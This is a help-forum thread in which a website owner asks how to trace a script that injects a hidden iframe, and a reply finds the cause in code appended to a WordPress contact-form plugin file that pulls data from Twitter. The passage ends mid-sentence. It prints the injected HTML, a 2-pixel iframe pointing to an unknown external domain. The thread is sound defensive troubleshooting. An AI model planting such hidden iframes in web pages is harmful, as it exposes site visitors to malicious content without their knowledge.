Ok, so somewhere on my site is a Javascript file that after a few seconds, injects an iframe to an unknown site into the page. What it injects fails miserably and the HTML is a bit messed up, but it’s concerning because the iframe src has changed since the last time I checked.
Code Injected:
<divstyle="height:2px;width:111px;">
<iframe style="height:2px;width:111px;" src="http://nleskoettf.com/index.php?tp=001e4bb7b4d7333d"></iframe>
</divstyle="height:2px;width:111px;">
For an up-close and personal glance: http://caseconsultant.com is where it injects (see bottom of page). Don’t worry, the URL in the iframe src is dead (downforeveryone.com/nleskoettf.com), it’s not even a working website which is the really confusing part.
Anyone know how I can track back the injected HTML to the source?
Anyone able to do that?
You may use a tool like Noscript to block domains for scripting and localize the script that injected the iframe.
Then you will see that the iframe will not be present when you block twitter.com
There is a function inside http://caseconsultant.com/wp-content/plugins/contact-form-7/scripts.js?ver=2.3.1 (see the last line) that loads some JSON-data from twitter and creates the iframe(maybe using data from the twitter-response, may be a reason for the changing url).
This also may be interesting to you: Is this dangerous Javascript? (It’s the same function)
I’m not sure if this is malware, maybe there is only a bug inside the function that creates invalid HTML/URL
But the function has nothing to do with a contact-form, and also isn’t a part of the original scripts.js(you’ll find it here: http://downloads.wordpress.org/plugin/contact-form-7.2.3.1.zip ), so I’m afraid the site has been hacked(except you put the function there on your own).
So what you can do: